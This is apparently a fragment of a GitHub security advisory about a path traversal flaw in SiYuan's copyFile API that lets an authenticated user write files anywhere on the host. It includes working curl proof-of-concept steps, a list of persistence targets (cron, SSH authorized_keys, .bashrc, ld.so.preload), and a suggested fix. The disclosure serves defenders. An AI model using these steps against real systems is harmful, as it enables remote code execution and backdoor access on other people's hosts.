+ "details": "## Summary\n\nThe `/api/file/copyFile` endpoint does not validate the `dest` parameter, allowing authenticated users to write files to arbitrary locations on the filesystem. This can lead to Remote Code Execution (RCE) by writing to sensitive locations such as cron jobs, SSH authorized_keys, or shell configuration files.\n\n- Affected Version: 3.5.3 (and likely all prior versions)\n\n## Details\n\n- Type: Improper Limitation of a Pathname to a Restricted Directory (CWE-22)\n- Location: `kernel/api/file.go` - copyFile function\n\n```go\n// kernel/api/file.go lines 94-139\nfunc copyFile(c *gin.Context) {\n // ...\n src := arg[\"src\"].(string)\n src, err := model.GetAssetAbsPath(src) // src is validated\n // ...\n\n dest := arg[\"dest\"].(string) // dest is NOT validated!\n if err = filelock.Copy(src, dest); err != nil {\n // ...\n }\n}\n```\n\nThe `src` parameter is properly validated via `model.GetAssetAbsPath()`, but the `dest` parameter accepts any absolute path without validation, allowing files to be written outside the workspace directory.\n\n## PoC\n\n### Step 1: Upload malicious content to workspace\n\n```bash\ncurl -X POST \"http://target:6806/api/file/putFile\" \\\n -H \"Authorization: Token <API_TOKEN>\" \\\n -F \"path=/data/assets/malicious.sh\" \\\n -F \"file=@-;filename=malicious.sh\" <<< '#!/bin/sh\nid > /tmp/pwned.txt\nhostname >> /tmp/pwned.txt'\n```\n\n### Step 2: Copy to arbitrary location (e.g., /tmp)\n\n```bash\ncurl -X POST \"http://target:6806/api/file/copyFile\" \\\n -H \"Authorization: Token <API_TOKEN>\" \\\n -H \"Content-Type: application/json\" \\\n -d '{\"src\": \"assets/malicious.sh\", \"dest\": \"/tmp/malicious.sh\"}'\n```\n\nResponse: `{\"code\":0,\"msg\":\"\",\"data\":null}`\n\n### Step 3: Verify file was written outside workspace\n\n```bash\ncat /tmp/malicious.sh\n# Output: #!/bin/sh\n# id > /tmp/pwned.txt\n# hostname >> /tmp/pwned.txt\n```\n\n## Attack Scenarios\n\n| Target Path | Impact |\n|-------------|--------|\n| `/etc/cron.d/backdoor` | Scheduled command execution (RCE) |\n| `~/.ssh/authorized_keys` | Persistent SSH access |\n| `~/.bashrc` | Command execution on user login |\n| `/etc/ld.so.preload` | Shared library injection |\n\n### RCE Demonstration\n\n RCE was successfully demonstrated by writing a script and executing it:\n\n```bash\n# Write script to /tmp\ncurl -X POST \"http://target:6806/api/file/copyFile\" \\\n -H \"Authorization: Token <API_TOKEN>\" \\\n -d '{\"src\": \"assets/malicious.sh\", \"dest\": \"/tmp/malicious.sh\"}'\n\n# Execute (simulating cron or login trigger)\nsh /tmp/malicious.sh\n\n# Result\ncat /tmp/pwned.txt\n# uid=0(root) gid=0(root) groups=0(root)...\n```\n\n## Impact\n\nAn authenticated attacker (with API Token) can:\n1. Achieve Remote Code Execution with the privileges of the SiYuan process\n2. Establish persistent backdoor access via SSH keys\n3. Compromise the entire host system\n4. Access sensitive data on the same network (lateral movement)\n\n## Suggested Fix\n\nAdd path validation to ensure `dest` is within the workspace directory:\n\n```go\nfunc copyFile(c *gin.Context) {\n // ...\n dest := arg[\"dest\"].(string)\n\n // Add validation\n if !util.IsSubPath(util.WorkspaceDir, dest) {\n ret.Code = -1\n ret.Msg = \"dest path must be within workspace\"\n return\n }\n\n if err = filelock.Copy(src, dest); err != nil {\n // ...\n }\n}\n```\n\n## Solution\n\nd7f790755edf8c78d2b4176171e5a0cdcd720feb",
![advisory-database[bot]](https://avatars.githubusercontent.com/in/21409?v=4&size=40){kind=avatar}
0 commit comments